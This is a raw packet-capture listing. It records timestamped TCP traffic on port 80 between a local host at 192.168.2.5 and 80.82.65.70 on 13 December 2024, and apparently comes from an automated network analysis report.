                                          Dec 13, 2024 06:12:58.473929882 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.497642040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.497705936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.497785091 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.497796059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.497834921 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.497867107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.497881889 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.497931957 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.498785973 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.498850107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.498887062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.498939991 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.499783993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.499836922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.499882936 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.499983072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.500744104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.500791073 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.500864983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.500915051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.501739025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.501790047 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.501831055 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.501878977 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.502722979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.502772093 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.502881050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.502950907 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.503755093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.503767014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.503814936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.503830910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.504687071 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.504750013 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.504793882 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.504848003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.505672932 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.505717993 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.505789995 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.505831003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.506669998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.506715059 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.540880919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.540954113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.540985107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.541332960 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.541368008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.541368008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.541434050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.541521072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.542324066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.542372942 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.542434931 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.542479038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.543297052 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.543333054 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.575962067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.576021910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.576049089 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.576097012 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.576481104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.576541901 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.576571941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.576610088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.577445984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.577491045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.577588081 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.577640057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.578428030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.578474998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.578542948 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.578584909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.579400063 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.579442978 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.579514027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.579555988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.580399036 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.580459118 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.580487967 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.580528021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.581373930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.581414938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.581455946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.581494093 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.582364082 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.582413912 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.582490921 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.582535028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.583357096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.583403111 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.583475113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.583518982 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.584353924 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.584420919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.584511995 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.584557056 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.585331917 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.585371017 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.585438967 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.585483074 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.586339951 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.586381912 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.586445093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.586488008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.587305069 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.587344885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.587419987 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.587464094 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.588337898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.588381052 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.588406086 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.588447094 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.589378119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.589396954 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.589421034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.589437962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.590291023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.590333939 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.590401888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.590445042 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.591272116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.591319084 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.591356039 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.591397047 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.592242002 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.592283010 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.592371941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.592412949 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.593233109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.593276024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.593343019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.593501091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.594243050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.594286919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.594347000 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.594389915 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.595388889 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.595401049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.595451117 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.595468998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.596240044 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.596283913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.596321106 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.596395969 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.597210884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.597255945 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.597265005 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.597307920 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.598220110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.598263979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.598293066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.598335028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.599196911 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.599236965 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.599303007 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.599345922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.600171089 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.600215912 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.600279093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.600318909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.601146936 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.601192951 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.601195097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.601233959 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.653651953 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.653744936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.653774023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.653825998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.653862000 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.653911114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.653944016 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.653992891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.654520988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.654570103 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.654616117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.654661894 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.655421019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.655468941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.655597925 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.655643940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.656292915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.656339884 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.656440020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.656486988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.657203913 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.657258034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.657272100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.657316923 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.658091068 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.658143044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.658168077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.658214092 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.658891916 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.658941984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.658989906 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.659034967 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.659770966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.659835100 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.659898043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.659948111 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.660697937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.660751104 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.660808086 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.660855055 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.661498070 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.661545038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.661611080 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.661652088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.662381887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.662424088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.662453890 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.662494898 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.663274050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.663326979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.663360119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.663405895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.664115906 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.664175987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.689776897 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.689878941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.689886093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.689929962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.690176964 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.690188885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.690223932 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.690257072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.691036940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.691085100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.691087961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.691132069 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.691916943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.691966057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.691993952 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.692042112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.692816019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.692867041 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.692912102 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.692959070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.693665028 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.693716049 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.693758965 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.693813086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.694576979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.694626093 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.694667101 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.694713116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.695401907 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.695453882 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.695496082 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.695545912 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.696311951 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.696373940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.696402073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.696456909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.697139025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.697205067 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.697241068 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.697289944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.732836008 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.732903004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.733022928 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.733074903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.733251095 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.733304024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.733405113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.733453989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.734128952 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.734179020 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.734277964 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.734328032 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.734982014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.735035896 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.768095016 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.768178940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.768202066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.768249035 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.768415928 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.768461943 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.768630981 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.768675089 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.769242048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.769289017 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.769570112 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.769614935 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.769659996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.769720078 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.770453930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.770502090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.770539045 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.770586014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.771303892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.771349907 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.771421909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.771466970 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.772169113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.772217989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.772254944 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.772303104 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.773068905 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.773118973 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.773156881 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.773202896 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.773924112 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.773972034 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.773972988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.774034023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.774789095 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.774835110 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.774903059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.774949074 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.775674105 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.775723934 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.775897980 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.776001930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.776536942 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.776583910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.776626110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.776669979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.777398109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.777443886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.777503967 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.777553082 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.778291941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.778357029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.778394938 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.778440952 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.779143095 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.779191017 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.779239893 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.779288054 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.780019999 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.780072927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.780143023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.780194044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.780911922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.780963898 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.781004906 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.781111002 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.781763077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.781810045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.781882048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.781929016 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.782653093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.782715082 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.782741070 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.782789946 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.783504009 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.783552885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.783601046 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.783644915 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.784385920 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.784439087 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.784482002 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.784527063 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.785255909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.785284996 CET804978680.82.65.70192.168.2.5
